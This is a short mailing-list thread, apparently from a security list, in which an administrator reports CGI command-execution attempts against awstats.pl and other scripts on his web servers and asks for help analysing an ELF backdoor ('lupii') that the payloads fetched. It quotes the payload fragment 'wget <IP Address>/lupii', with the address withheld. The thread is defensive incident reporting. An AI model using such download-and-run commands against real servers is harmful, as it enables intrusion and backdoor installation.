RE: Worm/Virus related to SID 3813: "WEB-CGI awstats.pl configdir command execution attempt" and other SIDs ?

[TPanaitescu () colorcon com]

Hi again everyone,

Got the same thing few minutes ago, coming from China this time, pointing 
to the same address for the download .... Seems to be spreading ? The 
downloaded file is definitely for Linux.

Tudor

__________________

Hi everyone,

Last night I caught an attack to my web servers here, the attack consisted 
in command execution attempts using various CGI vulnerabilities. The fact 
is that after looking at the payload of all connection attempts, they all 
had a "wget <IP Address>/lupii", same IP address, I can send it to the 
list if anybody needs it. I downloaded the file from that site, it is an 
elf executable and it seems to be a backdoor of some sort reporting back 
to the site. The attack was coming from Taiwan and the download site was 
in Norway. 

I am not good at looking at elf format programs, is anybody willing to 
take a look ? I can send the file on demand. Does anybody know what is 
this all about ?

Thanks,
Tudor